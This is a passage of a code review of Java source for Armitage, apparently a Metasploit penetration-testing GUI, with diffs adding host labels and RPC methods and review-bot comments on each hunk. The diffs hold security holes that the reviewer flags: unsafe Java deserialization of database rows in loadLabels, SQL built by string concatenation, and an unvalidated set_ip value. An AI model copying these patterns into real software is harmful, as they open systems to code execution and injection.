if (size > max) {
|
||||
first = first.next;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* retrieve a set of all clients consuming this buffer */
|
||||
public Collection clients() {
|
||||
synchronized (this) {
|
||||
LinkedList clients = new LinkedList(indices.keySet());
|
||||
return clients;
|
||||
}
|
||||
}
|
||||
|
||||
/* free a client */
|
||||
public void free(String id) {
|
||||
synchronized (this) {
|
||||
indices.remove(id);
|
||||
}
|
||||
}
|
||||
|
||||
/* reset our indices too */
|
||||
public void reset() {
|
||||
synchronized (this) {
|
||||
first = null;
|
||||
last = null;
|
||||
indices.clear();
|
||||
size = 0;
|
||||
}
|
||||
}
|
||||
|
||||
/* retrieve all messages available to the client (if any) */
|
||||
public String get(String id) {
|
||||
synchronized (this) {
|
||||
/* nadaz */
|
||||
if (first == null)
|
||||
return "";
|
||||
|
||||
/* get our index into the buffer */
|
||||
Message index = null;
|
||||
if (!indices.containsKey(id)) {
|
||||
index = first;
|
||||
}
|
||||
else {
|
||||
index = (Message)indices.get(id);
|
||||
|
||||
/* nothing happening */
|
||||
if (index.next == null)
|
||||
return "";
|
||||
|
||||
index = index.next;
|
||||
}
|
||||
|
||||
/* now let's walk through it */
|
||||
StringBuffer result = new StringBuffer();
|
||||
Message temp = index;
|
||||
while (temp != null) {
|
||||
result.append(temp.message);
|
||||
index = temp;
|
||||
temp = temp.next;
|
||||
}
|
||||
|
||||
/* store our index */
|
||||
indices.put(id, index);
|
||||
|
||||
return result.toString();
|
||||
}
|
||||
}
|
||||
|
||||
public String toString() {
|
||||
return "[" + size + " messages]";
|
||||
}
|
||||
}
|
|
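Review bot: `max` does not bound memory in `put`. Dropping the head with `first = first.next` only unlinks it from `first`; a cursor held in `indices` for a client that has stopped calling `get` still references its old node and, through the `next` chain, every message posted since. Unless `free(id)` is called for every departed client the list grows without limit, so consider expiring idle entries in `indices` or advancing lagging cursors when the head is dropped. Also, `size` is never decremented, so `toString` reports messages ever posted rather than messages held, and the `public` fields `first`, `last`, `size`, `max` and `indices` let callers bypass the `synchronized` blocks; make them private.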
@ -9,10 +9,10 @@ import sleep.engine.*;
|
|||
import sleep.parser.ParserConfig;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
import java.io.*;
|
||||
|
||||
import cortana.core.*;
|
||||
import ui.*;
|
||||
|
||||
/**
|
||||
* This class launches Armitage and loads the scripts that are part of it.
|
||||
|
@ -101,7 +101,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
};
|
||||
}
|
||||
|
||||
public ArmitageMain(String[] args) {
|
||||
public ArmitageMain(String[] args, MultiFrame window, boolean serverMode) {
|
||||
/* tweak the parser to recognize a few useful escapes */
|
||||
ParserConfig.installEscapeConstant('c', console.Colors.color + "");
|
||||
ParserConfig.installEscapeConstant('U', console.Colors.underline + "");
|
||||
|
@ -118,15 +118,6 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
ScriptLoader loader = new ScriptLoader();
|
||||
loader.addSpecificBridge(this);
|
||||
|
||||
/* check for server mode option */
|
||||
boolean serverMode = false;
|
||||
|
||||
int x = 0;
|
||||
for (x = 0; x < args.length; x++) {
|
||||
if (args[x].equals("--server"))
|
||||
serverMode = true;
|
||||
}
|
||||
|
||||
/* setup Cortana event and filter bridges... we will install these into
|
||||
Armitage */
|
||||
if (!serverMode) {
|
||||
|
@ -135,6 +126,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
|
||||
variables.putScalar("$__events__", SleepUtils.getScalar(events));
|
||||
variables.putScalar("$__filters__", SleepUtils.getScalar(filters));
|
||||
variables.putScalar("$__frame__", SleepUtils.getScalar(window));
|
||||
|
||||
loader.addGlobalBridge(events.getBridge());
|
||||
loader.addGlobalBridge(filters.getBridge());
|
||||
|
@ -142,7 +134,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
|
||||
/* load the appropriate scripts */
|
||||
String[] scripts = serverMode ? getServerScripts() : getGUIScripts();
|
||||
|
||||
int x = -1;
|
||||
try {
|
||||
for (x = 0; x < scripts.length; x++) {
|
||||
InputStream i = this.getClass().getClassLoader().getResourceAsStream(scripts[x]);
|
||||
|
@ -161,6 +153,23 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
}
|
||||
|
||||
public static void main(String args[]) {
|
||||
new ArmitageMain(args);
|
||||
/* check for server mode option */
|
||||
boolean serverMode = false;
|
||||
|
||||
int x = 0;
|
||||
for (x = 0; x < args.length; x++) {
|
||||
if (args[x].equals("--server"))
|
||||
serverMode = true;
|
||||
}
|
||||
|
||||
/* setup our armitage instance */
|
||||
if (serverMode) {
|
||||
new ArmitageMain(args, null, serverMode);
|
||||
}
|
||||
else {
|
||||
MultiFrame.setupLookAndFeel();
|
||||
MultiFrame frame = new MultiFrame();
|
||||
new ArmitageMain(args, frame, serverMode);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,60 @@
|
|||
package armitage;
|
||||
|
||||
import console.Console;
|
||||
import msf.*;
|
||||
import java.util.*;
|
||||
import java.awt.*;
|
||||
import java.awt.event.*;
|
||||
import javax.swing.*;
|
||||
|
||||
import java.io.IOException;
|
||||
|
||||
public class EventLogTabCompletion extends GenericTabCompletion {
|
||||
protected RpcConnection connection;
|
||||
|
||||
public EventLogTabCompletion(Console window, RpcConnection connection) {
|
||||
super(window);
|
||||
this.connection = connection;
|
||||
}
|
||||
|
||||
public Collection getOptions(String text) {
|
||||
try {
|
||||
Map response = (Map)connection.execute("armitage.lusers", new Object[] {});
|
||||
|
||||
if (response.get("lusers") == null)
|
||||
return null;
|
||||
|
||||
Iterator users = ((Collection)response.get("lusers")).iterator();
|
||||
|
||||
LinkedList options = new LinkedList();
|
||||
String word;
|
||||
String pre;
|
||||
|
||||
if (text.endsWith(" ")) {
|
||||
word = "";
|
||||
pre = text;
|
||||
}
|
||||
if (text.lastIndexOf(" ") != -1) {
|
||||
word = text.substring(text.lastIndexOf(" ") + 1);
|
||||
pre = text.substring(0, text.lastIndexOf(" ") + 1);
|
||||
}
|
||||
else {
|
||||
word = text;
|
||||
pre = "";
|
||||
}
|
||||
|
||||
while (users.hasNext()) {
|
||||
String user = users.next() + "";
|
||||
if (user.startsWith(word)) {
|
||||
options.add(pre + user);
|
||||
}
|
||||
}
|
||||
|
||||
return options;
|
||||
}
|
||||
catch (IOException ioex) {
|
||||
ioex.printStackTrace();
|
||||
}
|
||||
return null;
|
||||
}
|
||||
}
|
|
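Review bot: in `getOptions` the second test, `if (text.lastIndexOf(" ") != -1)`, is missing an `else`, so whatever the `text.endsWith(" ")` branch above it assigns is always overwritten by the if/else that follows. The result happens to be the same today (empty `word`, `pre` equal to `text`), but the first branch is dead code; make the second test an `else if` or delete the first branch. `getOptions` also issues the blocking `armitage.lusers` RPC on every completion, and a response whose `lusers` value is not a `Collection` raises a `ClassCastException` that the `IOException` handler does not catch.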
@ -15,7 +15,7 @@ public class Loader implements Loadable {
|
|||
protected ScriptLoader loader;
|
||||
protected Hashtable shared = new Hashtable();
|
||||
protected ScriptVariables vars = new ScriptVariables();
|
||||
protected Object[] passMe = new Object[2];
|
||||
protected Object[] passMe = new Object[3];
|
||||
protected List scripts = new LinkedList();
|
||||
|
||||
public void unsetDebugLevel(int flag) {
|
||||
|
@ -51,10 +51,11 @@ public class Loader implements Loadable {
|
|||
}
|
||||
}
|
||||
|
||||
public void passObjects(Object o, Object p) {
|
||||
public void passObjects(Object o, Object p, Object q) {
|
||||
synchronized (this) {
|
||||
passMe[0] = o;
|
||||
passMe[1] = p;
|
||||
passMe[2] = q;
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener {
|
|||
try {
|
||||
Object conns[] = setupConnections(host, port, user, pass, nick);
|
||||
//new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false);
|
||||
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host);
|
||||
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]);
|
||||
new Thread(this).start();
|
||||
}
|
||||
catch (java.lang.RuntimeException rex) {
|
||||
|
|
|
@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener {
|
|||
|
||||
protected Map tooltips = new HashMap();
|
||||
|
||||
public Object addNode(String id, String label, Image image, String tooltip) {
|
||||
public Object addNode(String id, String label, String description, Image image, String tooltip) {
|
||||
nodeImages.put(id, image);
|
||||
|
||||
if (label.length() > 0) {
|
||||
if (description.length() > 0) {
|
||||
description += "\n" + label;
|
||||
}
|
||||
else {
|
||||
description = label;
|
||||
}
|
||||
}
|
||||
|
||||
mxCell cell;
|
||||
if (!nodes.containsKey(id)) {
|
||||
cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97);
|
||||
cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97);
|
||||
nodes.put(id, cell);
|
||||
}
|
||||
else {
|
||||
cell = (mxCell)nodes.get(id);
|
||||
cell.setValue(label);
|
||||
cell.setValue(description);
|
||||
}
|
||||
nodes.touch(id);
|
||||
|
||||
|
|
|
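Review bot: `addNode` dereferences both `label` and the new `description` parameter with `.length()` and has no null check, while the `NetworkTable` version of the same method returns early when `id` or `label` is null. A null in either argument throws a `NullPointerException` here. Guard the arguments the same way in both implementations, or document that callers must pass empty strings.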
@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection {
|
|||
protected String workspaceid = "0";
|
||||
protected String hFilter = null;
|
||||
protected String sFilter = null;
|
||||
protected String[] lFilter = null;
|
||||
protected Route[] rFilter = null;
|
||||
protected String[] oFilter = null;
|
||||
protected int hindex = 0;
|
||||
protected int sindex = 0;
|
||||
|
||||
/* keep track of labels associated with each host */
|
||||
protected Map labels = new HashMap();
|
||||
|
||||
/* define the maximum hosts in a workspace */
|
||||
protected int maxhosts = 512;
|
||||
|
||||
|
@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection {
|
|||
return false;
|
||||
}
|
||||
|
||||
private boolean checkLabel(String host) {
|
||||
if (!labels.containsKey(host))
|
||||
return false;
|
||||
|
||||
String label_l = (labels.get(host) + "").toLowerCase();
|
||||
|
||||
for (int x = 0; x < lFilter.length; x++) {
|
||||
if (label_l.indexOf(lFilter[x]) != -1) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
private boolean checkOS(String os) {
|
||||
String os_l = os.toLowerCase();
|
||||
|
||||
|
@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection {
|
|||
return false;
|
||||
}
|
||||
|
||||
protected void loadLabels() {
|
||||
try {
|
||||
/* query database for label data */
|
||||
List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'");
|
||||
if (rows.size() == 0)
|
||||
return;
|
||||
|
||||
/* extract our BASE64 encoded data */
|
||||
String data = ((Map)rows.get(0)).get("data") + "";
|
||||
System.err.println("Read: " + data.length() + " bytes");
|
||||
|
||||
/* turn our data into raw data */
|
||||
byte[] raw = Base64.decode(data);
|
||||
|
||||
/* deserialize our notes data */
|
||||
ByteArrayInputStream store = new ByteArrayInputStream(raw);
|
||||
ObjectInputStream handle = new ObjectInputStream(store);
|
||||
Map temp = (Map)(handle.readObject());
|
||||
handle.close();
|
||||
store.close();
|
||||
|
||||
/* merge with our new map */
|
||||
labels.putAll(temp);
|
||||
}
|
||||
catch (Exception ex) {
|
||||
ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
protected void mergeLabels(Map l) {
|
||||
/* accept any label values and merge them into our global data set */
|
||||
Iterator i = l.entrySet().iterator();
|
||||
while (i.hasNext()) {
|
||||
Map.Entry entry = (Map.Entry)i.next();
|
||||
if ("".equals(entry.getValue())) {
|
||||
labels.remove(entry.getKey() + "");
|
||||
}
|
||||
else {
|
||||
labels.put(entry.getKey() + "", entry.getValue() + "");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* add labels to our hosts */
|
||||
public List addLabels(List rows) {
|
||||
if (labels.size() == 0)
|
||||
return rows;
|
||||
|
||||
Iterator i = rows.iterator();
|
||||
while (i.hasNext()) {
|
||||
Map entry = (Map)i.next();
|
||||
String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + "";
|
||||
if (labels.containsKey(address)) {
|
||||
entry.put("label", labels.get(address) + "");
|
||||
}
|
||||
else {
|
||||
entry.put("label", "");
|
||||
}
|
||||
}
|
||||
|
||||
return rows;
|
||||
}
|
||||
|
||||
public List filterByRoute(List rows, int max) {
|
||||
if (rFilter != null || oFilter != null) {
|
||||
if (rFilter != null || oFilter != null || lFilter != null) {
|
||||
Iterator i = rows.iterator();
|
||||
while (i.hasNext()) {
|
||||
Map entry = (Map)i.next();
|
||||
|
||||
/* make sure the address is within a route we care about */
|
||||
if (rFilter != null && entry.containsKey("address")) {
|
||||
if (!checkRoute(entry.get("address") + "")) {
|
||||
i.remove();
|
||||
|
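Review bot: `loadLabels` passes bytes read from the `notes` table straight to `ObjectInputStream.readObject()`, and the cast to `Map` happens only after the object graph has been built. Anyone who can write a row with `ntype = 'armitage.labels'` to the database controls what is deserialized in each client that calls `connect`. Store the host-to-label pairs in a plain text encoding, or at minimum subclass `ObjectInputStream` and override `resolveClass` to accept only `java.util.HashMap` and `java.lang.String`. The query can also return several rows while only `rows.get(0)` is used, and the `System.err.println("Read: ...")` debug line should be removed before merge.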
@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection {
|
|||
}
|
||||
}
|
||||
|
||||
/* make sure the host is something we care about too */
|
||||
if (oFilter != null && entry.containsKey("os_name")) {
|
||||
if (!checkOS(entry.get("os_name") + ""))
|
||||
if (!checkOS(entry.get("os_name") + "")) {
|
||||
i.remove();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
/* make sure the host has the right label */
|
||||
if (lFilter != null && entry.containsKey("address")) {
|
||||
if (!checkLabel(entry.get("address") + "")) {
|
||||
i.remove();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
else if (lFilter != null && entry.containsKey("host")) {
|
||||
if (!checkLabel(entry.get("host") + "")) {
|
||||
i.remove();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection {
|
|||
public void connect(String dbstring, String user, String password) throws Exception {
|
||||
db = DriverManager.getConnection(dbstring, user, password);
|
||||
setWorkspace("default");
|
||||
loadLabels();
|
||||
}
|
||||
|
||||
public Object execute(String methodName) throws IOException {
|
||||
|
@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection {
|
|||
/* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and
|
||||
filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting
|
||||
and limit the size of the final result there. */
|
||||
int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000;
|
||||
int limit2 = rFilter == null && oFilter == null ? maxservices : 100000;
|
||||
int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000;
|
||||
int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000;
|
||||
|
||||
temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid);
|
||||
|
||||
|
@ -209,13 +310,13 @@ public class DatabaseImpl implements RpcConnection {
|
|||
if (hFilter.indexOf("sessions.") >= 0)
|
||||
tables.add("sessions");
|
||||
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
|
||||
}
|
||||
else {
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
|
||||
}
|
||||
|
||||
temp.put("db.services", "SELECT DISTINCT services.*, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
|
||||
temp.put("db.services", "SELECT DISTINCT services.id, services.name, services.port, services.proto, services.info, services.updated_at, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
|
||||
temp.put("db.loots", "SELECT DISTINCT loots.*, hosts.address as host FROM loots, hosts WHERE hosts.id = loots.host_id AND hosts.workspace_id = " + workspaceid);
|
||||
temp.put("db.workspaces", "SELECT DISTINCT * FROM workspaces");
|
||||
temp.put("db.notes", "SELECT DISTINCT notes.*, hosts.address as host FROM notes, hosts WHERE hosts.id = notes.host_id AND hosts.workspace_id = " + workspaceid);
|
||||
|
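Review bot: the rewritten `db.hosts` and `db.services` statements still splice `hFilter` and `workspaceid` into the SQL text with `+`. This hunk does not show how `hFilter` is built, but if any part of it comes from the workspace dialog fields it has to be bound through a `PreparedStatement`, as the `db.report_labels` insert elsewhere in this file does. Replacing `hosts.*` and `services.*` with fixed column lists also drops every column not named here, so confirm that no caller of `db.hosts` or `db.services` reads one of the omitted fields.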
@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection {
|
|||
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices));
|
||||
}
|
||||
else if (methodName.equals("db.hosts")) {
|
||||
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts));
|
||||
result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts)));
|
||||
}
|
||||
else {
|
||||
result.put(methodName.substring(3), executeQuery(query));
|
||||
|
@ -311,6 +412,10 @@ public class DatabaseImpl implements RpcConnection {
|
|||
return new HashMap();
|
||||
}
|
||||
else if (methodName.equals("db.clear")) {
|
||||
/* clear our local cache of labels */
|
||||
labels = new HashMap();
|
||||
|
||||
/* clear the database */
|
||||
executeUpdate(
|
||||
"BEGIN;" +
|
||||
"DELETE FROM hosts;" +
|
||||
|
@ -332,6 +437,7 @@ public class DatabaseImpl implements RpcConnection {
|
|||
|
||||
rFilter = null;
|
||||
oFilter = null;
|
||||
lFilter = null;
|
||||
|
||||
List hosts = new LinkedList();
|
||||
List srvcs = new LinkedList();
|
||||
|
@ -385,6 +491,11 @@ public class DatabaseImpl implements RpcConnection {
|
|||
oFilter = (values.get("os") + "").toLowerCase().split(",\\s*");
|
||||
}
|
||||
|
||||
/* label filter */
|
||||
if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) {
|
||||
lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*");
|
||||
}
|
||||
|
||||
if (hosts.size() == 0) {
|
||||
hFilter = null;
|
||||
}
|
||||
|
@ -406,6 +517,31 @@ public class DatabaseImpl implements RpcConnection {
|
|||
result.put("rows", new Integer(stmt.executeUpdate()));
|
||||
return result;
|
||||
}
|
||||
else if (methodName.equals("db.report_labels")) {
|
||||
/* merge out global label data */
|
||||
Map values = (Map)params[0];
|
||||
mergeLabels(values);
|
||||
|
||||
/* delete our saved label data */
|
||||
executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'");
|
||||
|
||||
/* serialize our notes data */
|
||||
ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128);
|
||||
ObjectOutputStream handle = new ObjectOutputStream(store);
|
||||
handle.writeObject(labels);
|
||||
handle.close();
|
||||
store.close();
|
||||
|
||||
String data = Base64.encode(store.toByteArray());
|
||||
|
||||
/* save our label data */
|
||||
PreparedStatement stmt = null;
|
||||
stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)");
|
||||
stmt.setString(1, data);
|
||||
stmt.executeUpdate();
|
||||
|
||||
return new HashMap();
|
||||
}
|
||||
else if (methodName.equals("db.report_host")) {
|
||||
Map values = (Map)params[0];
|
||||
String host = values.get("host") + "";
|
||||
|
|
|
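Review bot: `db.report_labels` runs `DELETE FROM notes WHERE notes.ntype = 'armitage.labels'` before the map is serialized and inserted, with no transaction around the two statements. If `writeObject` or the `INSERT` throws, the stored labels are gone, and two clients reporting at the same time can interleave and leave zero or two rows. Serialize first, then do the delete and the insert inside one transaction. The `PreparedStatement` is also never closed.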
@ -32,7 +32,7 @@ public class RpcAsync implements RpcConnection, Async {
|
|||
if (methodName.equals("module.info") || methodName.equals("module.options") || methodName.equals("module.compatible_payloads")) {
|
||||
StringBuilder keysb = new StringBuilder(methodName);
|
||||
|
||||
for(int i = 1; i < params.length; i++)
|
||||
for(int i = 0; i < params.length; i++)
|
||||
keysb.append(params[i].toString());
|
||||
|
||||
String key = keysb.toString();
|
||||
|
|
|
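Review bot: the cache key in this hunk is `methodName` followed by each `params[i].toString()` with no separator, so distinct argument lists can produce the same key (`"ab"`, `"c"` and `"a"`, `"bc"`) and return another call's cached `module.info` or `module.options` result. Append a delimiter that cannot occur in a parameter, or key the cache on a `List` of the arguments.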
@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable {
|
|||
key.append(temp.get("ports"));
|
||||
key.append(";");
|
||||
key.append(temp.get("session"));
|
||||
key.append(";");
|
||||
key.append(temp.get("labels"));
|
||||
return key.toString();
|
||||
}
|
||||
|
||||
|
|
|
@ -84,12 +84,40 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async {
|
|||
}
|
||||
|
||||
protected HashMap locks = new HashMap();
|
||||
protected String address = "";
|
||||
|
||||
public String getLocalAddress() {
|
||||
return address;
|
||||
}
|
||||
|
||||
/** Adds token, runs command, and notifies logger on call and return */
|
||||
public Object execute(String methodName, Object[] params) throws IOException {
|
||||
if (database != null && "db.".equals(methodName.substring(0, 3))) {
|
||||
return database.execute(methodName, params);
|
||||
}
|
||||
else if (methodName.equals("armitage.ping")) {
|
||||
try {
|
||||
long time = System.currentTimeMillis() - Long.parseLong(params[0] + "");
|
||||
|
||||
HashMap res = new HashMap();
|
||||
res.put("result", time + "");
|
||||
return res;
|
||||
}
|
||||
catch (Exception ex) {
|
||||
HashMap res = new HashMap();
|
||||
res.put("result", "0");
|
||||
return res;
|
||||
}
|
||||
}
|
||||
else if (methodName.equals("armitage.my_ip")) {
|
||||
HashMap res = new HashMap();
|
||||
res.put("result", address);
|
||||
return res;
|
||||
}
|
||||
else if (methodName.equals("armitage.set_ip")) {
|
||||
address = params[0] + "";
|
||||
return new HashMap();
|
||||
}
|
||||
else if (methodName.equals("armitage.lock")) {
|
||||
if (locks.containsKey(params[0] + "")) {
|
||||
Map res = new HashMap();
|
||||
|
|
|
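Review bot: `armitage.set_ip` assigns `params[0] + ""` to `address` with no validation, and `armitage.my_ip` and `getLocalAddress()` hand that string back to callers. Check that the value parses as an IP address before storing it, and reject the call when `params` is empty rather than letting `params[0]` throw. `address` is also read and written inside `execute` without synchronization; mark it `volatile`. Separately, `"db.".equals(methodName.substring(0, 3))` throws `StringIndexOutOfBoundsException` for a method name shorter than three characters; `methodName.startsWith("db.")` is the safer test.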
@ -66,7 +66,7 @@ public class RpcQueue implements Runnable {
|
|||
Thread.sleep(50);
|
||||
}
|
||||
else {
|
||||
Thread.sleep(500);
|
||||
Thread.sleep(200);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
package table;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.*;
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.*;
|
||||
import javax.swing.border.*;
|
||||
import javax.swing.table.*;
|
||||
|
||||
import java.awt.*;
|
||||
import java.awt.*;
|
||||
import java.awt.event.*;
|
||||
import java.awt.image.*;
|
||||
|
||||
|
@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
public NetworkTable(Properties display) {
|
||||
this.display = display;
|
||||
|
||||
model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256);
|
||||
model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256);
|
||||
table = new ATable(model);
|
||||
TableRowSorter sorter = new TableRowSorter(model);
|
||||
sorter.toggleSortOrder(1);
|
||||
|
@ -79,23 +79,24 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
};
|
||||
|
||||
sorter.setComparator(1, hostCompare);
|
||||
sorter.setComparator(3, hostCompare);
|
||||
sorter.setComparator(4, hostCompare);
|
||||
|
||||
table.setRowSorter(sorter);
|
||||
table.setColumnSelectionAllowed(false);
|
||||
|
||||
table.getColumn("Address").setPreferredWidth(125);
|
||||
table.getColumn("Label").setPreferredWidth(125);
|
||||
table.getColumn("Pivot").setPreferredWidth(125);
|
||||
table.getColumn(" ").setPreferredWidth(32);
|
||||
table.getColumn(" ").setMaxWidth(32);
|
||||
table.getColumn("Description").setPreferredWidth(500);
|
||||
|
||||
final TableCellRenderer parent = table.getDefaultRenderer(Object.class);
|
||||
table.setDefaultRenderer(Object.class, new TableCellRenderer() {
|
||||
final TableCellRenderer phear = new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
|
||||
JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col);
|
||||
|
||||
if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
|
||||
if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
|
||||
component.setFont(component.getFont().deriveFont(Font.BOLD));
|
||||
}
|
||||
else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) {
|
||||
|
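Review bot: `sorter.setComparator(4, hostCompare)` and the renderer's `col == 4` test hard-code the position of the "Pivot" column, which is why both had to be renumbered from 3 when "Label" was inserted into the header array. Resolve the index from the column name once and reuse it in both places, so the next column change cannot silently sort or bold the wrong column.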
@ -110,9 +111,15 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
if (tip.length() > 0) {
|
||||
component.setToolTipText(tip);
|
||||
}
|
||||
|
||||
return component;
|
||||
}
|
||||
});
|
||||
};
|
||||
|
||||
table.getColumn("Address").setCellRenderer(phear);
|
||||
table.getColumn("Label").setCellRenderer(phear);
|
||||
table.getColumn("Description").setCellRenderer(phear);
|
||||
table.getColumn("Pivot").setCellRenderer(phear);
|
||||
|
||||
table.getColumn(" ").setCellRenderer(new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
|
||||
|
@ -252,16 +259,17 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
public void addActionForKeySetting(String key, String dvalue, Action action) {
|
||||
}
|
||||
|
||||
public Object addNode(String id, String label, Image image, String tooltip) {
|
||||
public Object addNode(String id, String label, String description, Image image, String tooltip) {
|
||||
if (id == null || label == null)
|
||||
return null;
|
||||
|
||||
HashMap map = new HashMap();
|
||||
map.put("Address", id);
|
||||
|
||||
if (label.indexOf(id) > -1)
|
||||
label = label.substring(id.length());
|
||||
map.put("Description", label);
|
||||
if (description.indexOf(id) > -1)
|
||||
description = description.substring(id.length());
|
||||
map.put("Label", label);
|
||||
map.put("Description", description);
|
||||
map.put("Tooltip", tooltip);
|
||||
map.put("Image", image);
|
||||
map.put(" ", tooltip);
|
||||
|
|
|
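Review bot: `addNode` now dereferences its new `description` parameter (`description.indexOf(id)`), but the guard at the top still only tests `id == null || label == null`, so a null description throws a NullPointerException. Add `description` to the null check or default it to an empty string. Separately, `indexOf(id) > -1` followed by `substring(id.length())` only strips the address correctly when it is a prefix of the description; `startsWith(id)` states that condition directly.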
@ -26,6 +26,12 @@ public class ATable extends JTable {
|
|||
specialitems.add("WORDLIST");
|
||||
specialitems.add("SESSION");
|
||||
specialitems.add("REXE");
|
||||
specialitems.add("EXE::Custom");
|
||||
specialitems.add("EXE::Template");
|
||||
specialitems.add("USERNAME");
|
||||
specialitems.add("PASSWORD");
|
||||
specialitems.add("SMBUser");
|
||||
specialitems.add("SMBPass");
|
||||
|
||||
return new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {
|
||||
|
|
|
@ -0,0 +1,238 @@
|
|||
package ui;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.*;
|
||||
|
||||
import java.awt.*;
|
||||
import java.awt.event.*;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
import armitage.ArmitageApplication;
|
||||
import msf.*;
|
||||
|
||||
/* A class to host multiple Armitage instances in one frame. Srsly */
|
||||
public class MultiFrame extends JFrame implements KeyEventDispatcher {
|
||||
protected JToolBar toolbar;
|
||||
protected JPanel content;
|
||||
protected CardLayout cards;
|
||||
